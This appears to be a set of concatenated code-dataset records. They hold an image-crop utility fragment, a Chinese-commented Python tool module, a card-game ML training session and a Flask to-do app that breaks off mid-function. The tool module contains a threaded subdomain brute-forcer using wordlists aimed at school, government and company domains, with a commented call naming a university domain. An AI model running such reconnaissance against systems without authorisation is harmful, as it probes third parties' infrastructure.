random_x + overlap:random_x+width - overlap, 0] = 2*117. / 255. - 1.\n image_all[random_y + overlap:random_y+height - overlap, random_x + overlap:random_x+width - overlap, 1] = 2*104. / 255. - 1.\n image_all[random_y + overlap:random_y+height - overlap, random_x + overlap:random_x+width - overlap, 2] = 2*123. / 255. - 1.\n\n return image_all, crop, random_x, random_y","sub_path":"src-mul/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"148921109","text":"import socket,os,threading,queue,time,re,platform\nfrom module import printc\ntry:\n import requests\nexcept:\n msg1=\"\\n[-] 检测到您还没有安装Python3的requests依赖包,请使用 pip install requests 安装\\n\"\n printc.printf(msg1,'red')\n#线程锁 \nlock = threading.Lock()\ncount = 0 #计数\n#获取当前操作系统的信息\nsysteminfo = platform.platform()\ndef test():\n printc.printf(\"124\",\"red\")\n\n#得到一个队列\ndef GetQueue(list):\n PortQueue = queue.Queue(65535)\n for p in list:\n PortQueue.put(p)\n return PortQueue\n\n#导入需要的依赖包,如果用户没有安装则提示用户安装\ndef importModules():\n try:\n import json\n except:\n msg1=\"\\n[-] 检测到您还没有安装Python3的json依赖包,请使用 pip install json 安装\\n\"\n printc.printf(msg1,'red')\n try:\n import requests\n except:\n msg1=\"\\n[-] 检测到您还没有安装Python3的requests依赖包,请使用 pip install requests 安装\\n\"\n printc.printf(msg1,'red')\n\n#通过域名获取ip\ndef getIPByName(host):\n try:\n return socket.gethostbyname(host)\n except:\n return 0\n pass\n\n#读取文件每一行并将文件内容存放在列表中\ndef content2List(add):\n # cwd=os.getcwd()\n dirList=[]\n # add=cwd+\"\\\\dict\\\\directory.txt\"\n f=open(add,\"rb\")\n for line in f.readlines():\n line = str(line)\n line = line.replace(\"\\\\r\",\"\")\n line = line.replace(\"\\\\n\",\"\")\n line = line.replace(\"b\\'\",\"\")\n line = line.replace(\"\\'\",\"\")\n dirList.append(str(line))\n #print(str(line))\n return dirList\n #dirList.append(str(line)[2:-1])\n # line = line.replace(\"\\\\n\",\"\")\n # line = line.replace(\"'\",\"\")\n # line = line.replace(\"b\",\"\")\n #dirList.append(str(line))\n#将内容写入文件\ndef write2file():\n #fileAdd,content\n 
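# crop_random() above cuts a square out of the image and fills the hole with
# per-channel constants. A minimal standalone numpy sketch of that
# crop-and-mask step (my own simplified single-channel version):
import numpy as np

def random_crop_with_hole(img, hole, rng=None):
    if rng is None:
        rng = np.random.default_rng()
    h, w = img.shape[:2]
    y = int(rng.integers(0, h - hole + 1))
    x = int(rng.integers(0, w - hole + 1))
    crop = img[y:y+hole, x:x+hole].copy()
    masked = img.copy()
    masked[y:y+hole, x:x+hole] = 0.0  # stand-in for the mean-colour fill
    return masked, crop, x, y

img = np.arange(64, dtype=float).reshape(8, 8)
masked, crop, x, y = random_crop_with_hole(img, 3, np.random.default_rng(0))
print(crop.shape, (x, y))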
content = []\n temp = ''\n for i in range(1,101):\n for i1 in range(101,201):\n for i2 in range(201,241):\n temp = str(i)+\",\"+str(i1)+\",\"+str(i2)\n content.append(temp)\n temp = ''\n for i in content:\n print(i)\n fileAdd = \"C:\\\\Users\\\\Ma\\\\Desktop\\\\1.txt\"\n with open(fileAdd,\"w\") as f:\n for i in content:\n f.write(i)\n f.write(\"\\n\")\n f.close()\n msg1 = \"[+] 文件存储在{add}\".format(add=fileAdd)\n print(msg1)\n\n#根据用户输入C:\\targets.txt /use/targets.txt http://www.baidu.com 返回不同字符串或者列表 判断用户输入的是地址还是网址\n#简单点讲就是根据用户输入的来决定输出结果是什么\ndef input2result(s):\n res = s\n if \"//\" not in s:\n res = content2List(s)\n return res\n\n \n#判断是否访问的页面是否存在\ndef ifExist(res):\n symbol=[\"404\",\"NOT FOUND\",\"对不起\"]\n p=\"([\\W\\w]*?)\"\n for i in symbol:\n if i in re.findall(p,res)[0]:\n return False\n break\n else:\n return True\n#bytes 转化为str\ndef bytes2str(input):\n if type(input)==\"bytes\":\n input=bytes.decode(input)\n return input\n#删除文件中无用且重复的信息 \ndef delUseless(add):\n try:\n s=[]\n f=open(add,\"r+\")\n for i in f.readlines():\n i=i.replace(\"\\n\",\"\") \n s.append(i)\n f.close()\n s=list(set(s))\n with open(add,\"w+\") as f:\n for i in s:\n f.write(i+\"\\n\")\n f.close()\n except:\n msg1=\"[-] 是不是路径输错了呢?\"\n printc.printf(msg1,\"red\")\n#将爬取的res转化为标准res.text的格式\ndef change2standard(res):\n try:\n if res.encoding==\"ISO-8859-1\":\n # res.encoding=\"utf-8\n result=res.text.encode(res.encoding).decode('GBK')\n #result=res.text.decode(res.encoding).encode(\"utf8\")\n else:\n result=res.text\n return bytes2str(result)\n except:\n if res.encoding==\"ISO-8859-1\":\n # res.encoding=\"utf-8\n #result=res.text.decode(res.encoding).encode(\"gbk\")\n result=res.text.encode(res.encoding).decode('utf8')\n else:\n result=res.text\n return bytes2str(result)\n\n\n#获取子域名类\nclass getSubdomainNames(threading.Thread):\n def __init__(self,subdomains,domain,protocol):\n threading.Thread.__init__(self)\n self.subdomains=subdomains\n self.domain=domain\n self.protocol=protocol\n self.p=\"([\\W\\w]*?)\"\n self.p1=\"([\\W\\w]*?)\"\n def run(self):\n global lock,count\n domain=self.domain\n while not self.subdomains.empty():\n subdomain=self.subdomains.get()\n # domain=httpOrHttps(domain)+\"://\" +subdomain+\".\"+domain\n domain=httpOrHttps(self.protocol)+\"://\" +subdomain+\".\"+domain\n # print(domain)\n #lock.acquire()\n try: \n res=requests.get(domain,timeout=2)\n result=change2standard(res)\n # print(result)\n # if ifExist(res)==True:\n if (re.findall(self.p,result)):\n title=(re.findall(self.p,result)[0])\n elif re.findall(self.p1,result):\n title=(re.findall(self.p1,result)[0])\n else:\n title=' '\n title=title.replace(\"\\n\",\"\")\n title=title.replace(\"\\r\",\"\")\n title=title.replace(\"\\t\",\"\")\n title=title.replace(\" \",'')\n count=count+1\n msg1=\"[+] \"+domain+\" \"+title\n printc.printf(msg1,'green')\n except:\n # msg2=domain+\"不可访问\"\n # printc.printf(msg2,'red')\n pass\n #lock.release()\n#根据不同的类型选择不同的字典 1 subnames_school 2 subnames_gov 3 subnames_company 0 default subnames ,当然也支持用户自定义字典\ndef dicJudgeByInput(Input):\n if \"Windows\" in systeminfo:\n if Input==0:\n return os.getcwd().replace(\"module\",\"dict\\subnames.txt\")\n elif Input==1:\n return os.getcwd()+\"\\dict\\subnames_school.txt\"\n elif Input==2:\n return os.getcwd().replace(\"module\",\"dict\\subnames_gov.txt\")\n elif Input==3:\n return os.getcwd().replace(\"module\",\"dict\\subnames_company.txt\")\n elif \"Linux\" in systeminfo:\n print(os.getcwd())\n if Input==0:\n return 
os.getcwd().replace(\"module\",\"dict/subnames.txt\")\n elif Input==1:\n return os.getcwd()+\"/dict/subnames_school.txt\"\n elif Input==2:\n return os.getcwd().replace(\"module\",\"dict/subnames_gov.txt\")\n elif Input==3:\n return os.getcwd().replace(\"module\",\"dict/subnames_company.txt\") \n else:\n return Input \n#判断网站使用的是http或者https\ndef httpOrHttps(protocol):\n if protocol==\"https\":\n protocol=\"https\"\n else:\n protocol=\"http\"\n return protocol\n\n#将字符串设定为统一长度\ndef setStr2SameLen(length,string,fillStr=\" \"):\n if length>len(string):\n length=length-len(string)\n for i in range(length):\n string=string+fillStr\n return string\n else:\n return string\n#将数据打印在表格里的表头效果如下\n''' >title1<\n>---t1_len----< >---t1_len----<\n URL | Start Time | Profile | Speed | ID\n---------------------------------+----------------------+---------------------+---------+------------------------------------------\nhttps://www.baidu.com\n\n>-------ti----------<\n\n相关参数控制效果如图所示\n'''\n#t1_len 输出固定长度=2*t1_len+len(title1),title标题\ndef setSheetTitle(t1_len=0,title1=0,t2_len=0,title2=0,t3_len=0,title3=0,t4_len=0,title4=0,t5_len=0,title5=0,color='white'):\n #此时输出一个表格\n if t1_len!=0 and t2_len == 0:\n space_1= setStr2SameLen(t1_len,\"\",\" \")\n len1 = 2*t1_len + len(title1)\n space1 = setStr2SameLen(len1,\"\",\"-\") #空白部分用\"-\"来填充\n msg = space_1 +str(title1) + space_1 +str(\"|\")\n below = space1 + str(\"+\") # 输出-----------------+使其看着更像一个表格\n if color != \"white\":\n print(msg)\n print(below)\n else:\n printc.printf(msg,color)\n printc.printf(below,color)\n\n #此时输出两个表格\n elif t2_len!=0 and t3_len == 0:\n space_1 = setStr2SameLen(t1_len,\"\",\" \")\n space_2 = setStr2SameLen(t2_len,\"\",\" \")\n msg = space_1 + str(title1) + space_1 +str(\"|\") + space_2 + str(title2) + space_2 \n len1 = 2*t1_len + len(title1)\n space1 = setStr2SameLen(len1,\"\",\"-\") + str(\"+\")\n len2 = 2*t2_len + len(title2)\n space2 = setStr2SameLen(len2,\"\",\"-\")\n below = space1 + space2\n if color == \"white\":\n print(msg)\n print(below)\n else:\n printc.printf(msg,color)\n printc.printf(below,color)\n #此时输出三个表格\n elif t3_len!=0 and t4_len == 0:\n space_1 = setStr2SameLen(t1_len,\"\",\" \")\n space_2 = setStr2SameLen(t2_len,\"\",\" \")\n space_3 = setStr2SameLen(t3_len,\"\",\" \")\n # space_4 = setStr2SameLen(t4_len,\"\",\" \")\n msg = space_1 + str(title1) + space_1 +str(\"|\") + space_2 + str(title2) + space_2 + str(\"|\")+ space_3 + str(title3) + space_3\n len1 = 2*t1_len + len(title1)\n space1 = setStr2SameLen(len1,\"\",\"-\") + str(\"+\")\n len2 = 2*t2_len + len(title2)\n space2 = setStr2SameLen(len2,\"\",\"-\") + str(\"+\")\n len3 = 2*t3_len + len(title3)\n space3 = setStr2SameLen(len3,\"\",\"-\")\n below = space1 + space2 + space3\n if color == \"white\":\n print(msg)\n print(below)\n else:\n printc.printf(msg,color)\n printc.printf(below,color)\n #此时输出四个表格\n elif t4_len!=0 and t5_len == 0:\n space_1 = setStr2SameLen(t1_len,\"\",\" \")\n space_2 = setStr2SameLen(t2_len,\"\",\" \")\n space_3 = setStr2SameLen(t3_len,\"\",\" \")\n space_4 = setStr2SameLen(t4_len,\"\",\" \")\n msg = space_1 + str(title1) + space_1 + str(\"|\") + space_2 + str(title2) + space_2 + str(\"|\")+ space_3 + str(title3) + space_3 + str(\"|\") + space_4 + str(title4) +space_4\n len1 = 2*t1_len + len(title1)\n space1 = setStr2SameLen(len1,\"\",\"-\") + str(\"+\")\n len2 = 2*t2_len + len(title2)\n space2 = setStr2SameLen(len2,\"\",\"-\") + str(\"+\")\n len3 = 2*t3_len + len(title3)\n space3 = setStr2SameLen(len3,\"\",\"-\") + str(\"+\")\n len4 = 2*t4_len + 
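# setStr2SameLen() re-implements fixed-width padding by hand; Python's
# str.ljust/str.center already do this. A hedged sketch of the same table
# header with stdlib calls only (widths are arbitrary examples):
cols = [('URL', 33), ('Start Time', 22), ('Profile', 21), ('Speed', 9), ('ID', 12)]
print('|'.join(name.center(width) for name, width in cols))
print('+'.join('-' * width for _, width in cols))
row = ['https://www.baidu.com', '12:00', 'default', 'fast', '1']
print('|'.join(val.ljust(width) for val, (_, width) in zip(row, cols)))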
len(title4)\n space4 = setStr2SameLen(len4,\"\",\"-\")\n below = space1 + space2 + space3 +space4\n if color == \"white\":\n print(msg)\n print(below)\n else:\n printc.printf(msg,color)\n printc.printf(below,color)\n #此时输出五个表格\n elif t5_len!=0:\n space_1 = setStr2SameLen(t1_len,\"\",\" \")\n space_2 = setStr2SameLen(t2_len,\"\",\" \")\n space_3 = setStr2SameLen(t3_len,\"\",\" \")\n space_4 = setStr2SameLen(t4_len,\"\",\" \")\n space_5 = setStr2SameLen(t5_len,\"\",\" \")\n msg = space_1 + str(title1) + space_1 + str(\"|\") + space_2 + str(title2) + space_2 + str(\"|\")+ space_3 + str(title3) + space_3 + str(\"|\") + space_4 + str(title4) +space_4 + str(\"|\") + space_5 + str(title5) + space_5\n len1 = 2*t1_len + len(title1)\n space1 = setStr2SameLen(len1,\"\",\"-\") + str(\"+\")\n len2 = 2*t2_len + len(title2)\n space2 = setStr2SameLen(len2,\"\",\"-\") + str(\"+\")\n len3 = 2*t3_len + len(title3)\n space3 = setStr2SameLen(len3,\"\",\"-\") + str(\"+\")\n len4 = 2*t4_len + len(title4)\n space4 = setStr2SameLen(len4,\"\",\"-\") + str(\"+\")\n len5 = 2*t5_len + len(title5)\n space5 = setStr2SameLen(len5,\"\",\"-\")\n below = space1 + space2 + space3 +space4 + space5\n if color == \"white\":\n print(msg)\n print(below)\n else:\n printc.printf(msg,color)\n printc.printf(below,color)\n\n''' >title1<\n>---t1_len----< >---t1_len----<\n URL | Start Time | Profile | Speed | ID\n---------------------------------+----------------------+---------------------+---------+------------------------------------------\nhttps://www.baidu.com\n\n>-------ti----------<\n\n相关参数控制效果如图所示\n'''\n#将数据打印在一个表格里面,ti_len 参数控制表格的长度(ti_len*2+len(title)),titlei参数空控制标题的内容\ndef print2sheet(t1_len=0,t1=0,title1=0,t2_len=0,t2=0,title2=0,t3_len=0,t3=0,title3=0,t4_len=0,t4=0,title4=0,t5_len=0,t5=0,title5=0,color='white'):\n #此时输出一个表格,并且要与上面表格标题对齐\n if t1_len!=0 and t2_len == 0:\n len1 = 2*t1_len + len(title1)\n space_1 = setStr2SameLen(len1,t1,\" \") + \"|\"\n msg = space_1 \n if color == \"white\":\n print(msg)\n else:\n printc.printf(msg,color)\n #此时输出两个表格\n elif t2_len!=0 and t3_len == 0:\n len1 = 2*t1_len + len(title1)\n space_1 = setStr2SameLen(len1,t1,\" \") + \"|\"\n len2 = 2*t2_len + len(title2)\n space_2 = setStr2SameLen(len2,t2,\" \") \n msg = space_1 + space_2\n if color == \"white\":\n print(msg)\n else:\n printc.printf(msg,color)\n #此时输出三个表格\n elif t3_len!=0 and t4_len == 0:\n len1 = 2*t1_len + len(title1)\n space_1 = setStr2SameLen(len1,t1,\" \") + \"|\"\n len2 = 2*t2_len + len(title2)\n space_2 = setStr2SameLen(len2,t2,\" \") + \"|\"\n len3 = 2*t3_len + len(title3)\n space_3 = setStr2SameLen(len3,t3,\" \") \n msg = space_1 + space_2 + space_3\n if color == \"white\":\n print(msg)\n else:\n printc.printf(msg,color)\n #此时输出四个表格\n elif t4_len!=0 and t5_len == 0:\n len1 = 2*t1_len + len(title1)\n space_1 = setStr2SameLen(len1,t1,\" \") + \"|\"\n len2 = 2*t2_len + len(title2)\n space_2 = setStr2SameLen(len2,t2,\" \") + \"|\"\n len3 = 2*t3_len + len(title3)\n space_3 = setStr2SameLen(len3,t3,\" \") + \"|\"\n len4 = 2*t4_len + len(title4)\n space_4 = setStr2SameLen(len4,t4,\" \") \n msg = space_1 + space_2 + space_3 + space_4\n if color == \"white\":\n print(msg)\n else:\n printc.printf(msg,color)\n #此时输出五个表格\n elif t5_len!=0:\n len1 = 2*t1_len + len(title1)\n space_1 = setStr2SameLen(len1,t1,\" \") + \"|\"\n len2 = 2*t2_len + len(title2)\n space_2 = setStr2SameLen(len2,t2,\" \") + \"|\"\n len3 = 2*t3_len + len(title3)\n space_3 = setStr2SameLen(len3,t3,\" \") + \"|\"\n len4 = 2*t4_len + len(title4)\n space_4 = 
setStr2SameLen(len4,t4,\" \") + \"|\"\n len5 = 2*t5_len + len(title5)\n space_5 = setStr2SameLen(len5,t5,\" \")\n msg = space_1 + space_2 + space_3 + space_4 + space_5\n if color == \"white\":\n print(msg)\n else:\n printc.printf(msg,color)\n\n#获取子域名\ndef getSubdomainName(nThreads,Num,domain,protocol):\n global count\n start_time=time.time()\n add=dicJudgeByInput(Num)\n subdomains=GetQueue(content2List(add))\n ThreadList=[]\n for i in range(0, nThreads):\n t = getSubdomainNames(subdomains,domain,protocol)\n ThreadList.append(t)\n for t in ThreadList:\n t.start()\n for t in ThreadList:\n t.join()\n msg1=\"[+] Time cost:\"+str(time.time()-start_time)+\" s\"\n msg2=\"[+] {count} Subdomains have been found\".format(count=count)\n printc.printf(msg1,\"green\")\n printc.printf(msg2,\"green\")\nif __name__=='__main__':\n write2file()\n # getSubdomainName(300,1,\"ncu.edu.cn\",\"http\")\n #bingRequests(\"site:ncu.edu.cn\")\n #delUseless(\"D:\\\\Github\\\\scan\\\\dict\\\\subnames_school.txt\")\n\n","sub_path":"module/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":16343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"161153366","text":"from triaddeck import TriadDeck\nfrom triadgame import TriadGame, TriadGameState, TriadMod\nfrom tqdm import tqdm\nimport random\n\n###############################################################################\n# Game session for ML training\n# - observation: getState()\n# - take action: step()\n#\n\nclass TriadGameSession():\n def __init__(self):\n self.initializeGame()\n self.debug = False\n self.hasErrors = False\n\n def generateMods(self, maxMods = 4):\n numMods = random.randrange(0, maxMods + 1)\n mods = []\n blocked = []\n\n while len(mods) < numMods:\n idx = random.randrange(0, len(TriadMod.modDB))\n testMod = TriadMod.modDB[idx]\n if any(testMod.name in s for s in blocked):\n continue\n\n mods.append(testMod)\n blocked += testMod.blockedMods\n blocked.append(testMod.name)\n\n return []#mods\n\n def initializeGame(self):\n self.game = TriadGame()\n self.game.mods = self.generateMods()\n self.game.opponentDeck = TriadDeck.generateDeckPlayer()\n self.game.playerDeck = TriadDeck.generateDeckPlayer()\n self.game.playerDeck.makeAllVisible()\n\n for mod in self.game.mods:\n mod.onMatchStart(self.game)\n\n self.game.cacheCaptureConditions()\n self.game.state = TriadGameState.PlayerTurn if (random.random() < 0.5) else TriadGameState.OpponentTurn\n self.game.onTurnStart()\n\n def getAvailPositions(self):\n if (self.game.forcedBoardIdx >= 0):\n return [ self.game.forcedBoardIdx ]\n\n availPos = []\n for i in range(len(self.game.owner)):\n if (self.game.owner[i] == 0):\n availPos.append(i)\n\n return availPos\n\n def getAvailCards(self):\n if (self.game.forcedCardIdx >= 0):\n return [ self.game.forcedCardIdx ]\n\n deck = self.game.playerDeck if (self.game.state == TriadGameState.PlayerTurn) else self.game.opponentDeck\n availCardIndices = []\n for i in range(5):\n if deck.hasCard(i):\n availCardIndices.append(i)\n\n return availCardIndices\n\n def getAvailActions(self):\n listCards = self.getAvailCards()\n listPos = self.getAvailPositions()\n\n if (len(listCards) > 0 and len(listPos) > 0):\n return [(itCard + (itPos * 5)) for itPos in listPos for itCard in listCards]\n return []\n\n def getMaxActions(self):\n return 5 * 9\n\n def getCardState(self, cardInfo):\n # [ available, known, type or 0, meta type, meta sides 0..3 (will be = to sides if known), avg power, meta rarirty ]\n # meta: avail, 
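# getSubdomainName() above is the classic queue-plus-worker-threads driver.
# A self-contained sketch of that pattern with a dummy task standing in for
# the HTTP probe (illustration only):
import queue
import threading

def worker(jobs, results):
    while True:
        try:
            item = jobs.get_nowait()
        except queue.Empty:
            return
        results.append(item * item)  # pretend this is the network request
        jobs.task_done()

jobs = queue.Queue()
for i in range(10):
    jobs.put(i)
results = []
threads = [threading.Thread(target=worker, args=(jobs, results)) for _ in range(4)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(sorted(results))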
known, type or 0, avg power, meta rarity\n state = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n metaState = [ 0, 0, 0, 0, 0 ]\n\n if cardInfo[0] == 1:\n cardMeta = cardInfo[3]\n state = [1, cardInfo[1], 0, cardMeta.typePct, cardMeta.sides[0], cardMeta.sides[1], cardMeta.sides[2], cardMeta.sides[3], cardMeta.avgPower, cardMeta.rarity]\n if cardInfo[2] != None:\n state[2] = cardInfo[2].cardType\n metaState = [1, cardInfo[1], state[2], cardMeta.avgPower, cardMeta.rarity]\n\n return state, metaState\n\n def getState(self):\n state = []\n useDefenceValues = True\n\n # precalc values\n moveOwnerId = TriadGame.ownerPlayer if self.game.state == TriadGameState.PlayerTurn else TriadGame.ownerOpponent\n oppOwnerId = -moveOwnerId\n deckMove = self.game.playerDeck if self.game.state == TriadGameState.PlayerTurn else self.game.opponentDeck\n deckOpp = self.game.opponentDeck if self.game.state == TriadGameState.PlayerTurn else self.game.playerDeck\n cardInfoMove = deckMove.getCardsInfo()\n cardInfoOpp = deckOpp.getCardsInfo()\n\n defenceMove = None\n defenceOpp = None\n if useDefenceValues:\n defenceMove, defenceOpp = self.evalDefences(moveOwnerId, oppOwnerId, cardInfoMove, cardInfoOpp)\n\n # one-hot: active modifiers\n allGameMods = [mod.name for mod in TriadMod.modDB]\n activeMods = [mod.name for mod in self.game.mods]\n state += [1 if (s in activeMods) else 0 for s in allGameMods]\n # value of type modes\n state += self.game.typeMod\n\n # one-hot: valid board placement\n if self.game.forcedBoardIdx >= 0:\n state += [1 if (pos == self.game.forcedBoardIdx) else 0 for pos in range(len(self.game.owner))]\n else:\n state += [1 if (ownerId == 0) else 0 for ownerId in self.game.owner]\n\n # one-hot: valid cards for move's owner\n if self.game.forcedCardIdx >= 0:\n state += [1 if (cardIdx == self.game.forcedCardIdx) else 0 for cardIdx in range(5)]\n else:\n state += [1 if (cardState != TriadDeck.cardNone) else 0 for cardState in deckMove.state]\n\n metaState = state.copy()\n\n # board cells: [ relative ownerId, type, sides 0..3, defence eval..]\n # meta cell: [ relative ownerId, type, avg sides, defence evals in 0.25 increments]\n for pos in range(len(self.game.owner)):\n cellInfo = [0, 0, 0, 0, 0, 0]\n metaInfo = [0, 0, 0]\n if self.game.owner[pos] != 0:\n cardOb = self.game.board[pos]\n cellInfo = [1 if self.game.owner[pos] == moveOwnerId else -1, cardOb.cardType, cardOb.sides[0], cardOb.sides[1], cardOb.sides[2], cardOb.sides[3]]\n metaInfo = [cellInfo[0], cellInfo[1], (cardOb.sides[0] + cardOb.sides[1] + cardOb.sides[2] + cardOb.sides[3]) / 4]\n\n state += cellInfo\n metaState += metaInfo\n if useDefenceValues:\n state += defenceMove[pos]\n state += defenceOpp[pos]\n for defIdx in range(len(defenceMove[pos])):\n metaState.append(int(defenceMove[pos][defIdx] * 4) / 4)\n metaState.append(int(defenceOpp[pos][defIdx] * 4) / 4)\n\n # card data for move owner & opponent\n for i in range(5):\n cardMS, cardMM = self.getCardState(cardInfoMove[i])\n cardOS, cardOM = self.getCardState(cardInfoOpp[i])\n state += cardMS\n state += cardOS\n metaState += cardMM\n metaState += cardOM\n\n return state, metaState\n\n def evalSlotDefenceForOwner(self, pos, ownerId, oppCardsInfo, numOppCards):\n numValues = 0\n capturingCards = [ False ] * len(oppCardsInfo)\n capturingMetas = [ False ] * len(oppCardsInfo)\n\n for side,neiPos in TriadGame.cachedNeis[pos]:\n if self.game.owner[neiPos] == 0:\n numValues += self.game.findCapturingWeakness(pos, side)\n for cardIdx in range(len(oppCardsInfo)):\n if oppCardsInfo[cardIdx][0] == 1:\n if not 
capturingCards[cardIdx] and (oppCardsInfo[cardIdx][1] == 1):\n capturingCards[cardIdx] = self.game.canCaptureWithCard(pos, oppCardsInfo[cardIdx][2], side)\n if not capturingMetas[cardIdx]:\n capturingMetas[cardIdx] = self.game.canCaptureWithMeta(pos, oppCardsInfo[cardIdx][3], side)\n\n numOppCards = max(1, numOppCards)\n pctCardsKnown = sum(1 for i in capturingCards if i) / numOppCards\n pctCardsMeta = sum(1 for i in capturingMetas if i) / numOppCards\n return [1 - (numValues / 40), pctCardsKnown, pctCardsMeta]\n\n def evalDefences(self, moveOwnerId, oppOwnerId, moveCardsInfo, oppCardsInfo):\n # data for board cell:\n # - avg defence if owned or 0 (side defence: num values that can capture it directly)\n # - % of cards in opposing deck that can capture it directly\n # - as above, but using meta card values\n\n resultMove = [[0, 0, 0]] * len(self.game.board)\n resultOpp = [[0, 0, 0]] * len(self.game.board)\n\n totalPlaced = sum(self.game.mapPlaced)\n isFinished = totalPlaced >= len(self.game.board)\n if isFinished:\n return resultMove, resultOpp\n\n numMoveCards = sum(1 for info in moveCardsInfo if info[0] == 1)\n numOppCards = sum(1 for info in oppCardsInfo if info[0] == 1)\n\n for pos in range(len(self.game.board)):\n if self.game.owner[pos] == moveOwnerId:\n resultMove[pos] = self.evalSlotDefenceForOwner(pos, moveOwnerId, oppCardsInfo, numOppCards)\n elif self.game.owner[pos] == oppOwnerId:\n resultOpp[pos] = self.evalSlotDefenceForOwner(pos, oppOwnerId, moveCardsInfo, numMoveCards)\n\n return resultMove, resultOpp\n\n def playRandomMove(self):\n actions = self.getAvailActions()\n if len(actions) == 0:\n self.hasErrors = True\n if self.debug:\n self.game.showState('ERROR!')\n print('Avail cards:',self.getAvailCards())\n print('Avail board:',self.getAvailPositions())\n return\n\n action = random.choice(actions)\n\n cardIdx = action % 5\n boardPos = int(action / 5)\n placed = False\n if (self.game.state == TriadGameState.OpponentTurn):\n placed = self.game.placeCardFromDeck(boardPos, cardIdx, TriadGame.ownerOpponent)\n if not placed:\n self.hasErrors = True\n if self.debug:\n self.game.showState('ERROR!')\n print('Avail cards:',self.getAvailCards())\n print('Avail board:',self.getAvailPositions())\n return\n else:\n placed = self.game.placeCardFromDeck(boardPos, cardIdx, TriadGame.ownerPlayer)\n\n if placed:\n self.getState()\n self.game.onTurnStart()\n\n def playRandomGame(self):\n while not self.isFinished() and not self.hasErrors:\n if self.debug:\n self.game.showState('step')\n self.playRandomMove()\n\n if not self.hasErrors and self.debug:\n self.game.showState('done')\n\n def isFinished(self):\n return (self.game.state == TriadGameState.GameWin) or (self.game.state == TriadGameState.GameDraw) or (self.game.state == TriadGameState.GameLose)\n\n def step(self, action):\n cardIdx = action % 5\n boardPos = int(action / 5)\n if self.debug:\n print('step: requesting card:%i at %i' % (cardIdx, boardPos))\n\n placed = self.game.placeCardFromDeck(boardPos, cardIdx, TriadGame.ownerPlayer)\n done = self.isFinished()\n\n if placed:\n reward = self.game.getNumByOwner(TriadGame.ownerPlayer)\n if not done:\n self.game.onTurnStart()\n if self.debug:\n print('step: play random move, turn:',str(self.game.state))\n self.playRandomMove()\n else:\n reward = -10\n\n state = self.getState()\n return state, reward, done\n\n\n##############################################################################\n# test me\n\ndef runTestPlayRandomGames(numGames, reproSeed):\n if reproSeed < 0:\n 
print('Running',numGames,'random test games...')\n\n for i in tqdm(range(numGames)):\n seed = random.randrange(999999)\n random.seed(seed)\n session = TriadGameSession()\n session.seed = seed\n\n if reproSeed < 0:\n session.playRandomGame()\n else:\n seed = reproSeed\n session.hasErrors = True\n\n if session.hasErrors:\n random.seed(seed)\n session = TriadGameSession()\n session.debug = True\n session.game.debug = True\n session.playRandomGame()\n if session.hasErrors:\n print('Repro seed:',seed)\n else:\n print('FIXED')\n break\n\ndef runTestBoardState(reproSeed):\n seed = reproSeed\n if (reproSeed < 0):\n seed = random.randrange(999999)\n random.seed(seed)\n\n session = TriadGameSession()\n for i in range(3):\n session.playRandomMove()\n session.game.showState('3 moves, seed:%i' % (seed))\n\n defenceBlue, defenceRed = session.evalDefences(\n TriadGame.ownerPlayer, TriadGame.ownerOpponent,\n session.game.playerDeck.getCardsInfo(),\n session.game.opponentDeck.getCardsInfo())\n\n print('Defence blue:', defenceBlue)\n print('Defence red:', defenceRed)\n\n #print('State:',session.getState())\n\nif __name__ == \"__main__\":\n runTestPlayRandomGames(100000, reproSeed=-1)\n #runTestBoardState(reproSeed=-1)\n","sub_path":"ml/gamelogic/triadsession.py","file_name":"triadsession.py","file_ext":"py","file_size_in_byte":12567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"335344273","text":"from flask import Flask, render_template, request, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\nfrom werkzeug.utils import secure_filename\n\nimport os\n\napplication= Flask(__name__)\napplication.config['SQLALCHEMY_DATABASE_URI'] = \"sqlite:///todo.db\"\napplication.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napplication.config['UPLOAD_FOLDER1'] = \"/Users/sandy/FLASK2021/uploads\"\napplication.config['UPLOAD_FOLDER2'] = \"/Users/sandy/FLASK2021/uploads2\"\ndb = SQLAlchemy(application)\n\nclass Todo(db.Model):\n sno = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(200), nullable=False)\n desc = db.Column(db.String(500), nullable=False)\n date_created = db.Column(db.DateTime, default=datetime.utcnow)\n\n def __repr__(self) -> str:\n return f\"{self.sno} - {self.title}\"\n\ncounter = 1\n\n\n\n@application.route('/', methods=['GET', 'POST'])\ndef hello_world():\n if request.method=='POST':\n title = request.form['title']\n desc = request.form['desc']\n todo = Todo(title=title, desc=desc)\n db.session.add(todo)\n db.session.commit()\n \n allTodo = Todo.query.all() \n return render_template('index.html', allTodo=allTodo)\n\n@application.route('/show')\ndef products():\n allTodo = Todo.query.all()\n print(allTodo)\n return 'this is products page'\n\n@application.route('/update/', methods=['GET', 'POST'])\ndef update(sno):\n if request.method=='POST':\n title = request.form['title']\n desc = request.form['desc']\n todo = Todo.query.filter_by(sno=sno).first()\n todo.title = title\n todo.desc = desc\n db.session.add(todo)\n db.session.commit()\n return redirect(\"/\")\n \n todo = Todo.query.filter_by(sno=sno).first()\n return render_template('update.html', todo=todo)\n\n@application.route('/delete/')\ndef delete(sno):\n todo = Todo.query.filter_by(sno=sno).first()\n db.session.delete(todo)\n db.session.commit()\n return redirect(\"/\")\n\n\n\n@application.route(\"/uploader\" , methods=['GET', 'POST'])\ndef uploader():\n \n global counter\n \n\n if (counter < 3):\n if request.method=='POST':\n f = 
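# runTestPlayRandomGames() records the seed before every random playout so a
# failing game can be replayed deterministically with debug output on. The
# same pattern in isolation (hedged sketch with a toy "failure" condition):
import random

def run_once(seed, debug=False):
    random.seed(seed)
    rolls = [random.randrange(2) for _ in range(3)]
    if debug:
        print('rolls:', rolls)
    return rolls != [0, 0, 0]  # pretend triple zero is a bug

for _ in range(1000):
    seed = random.randrange(999999)
    if not run_once(seed):
        print('repro seed:', seed)
        run_once(seed, debug=True)  # exact deterministic replay
        break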
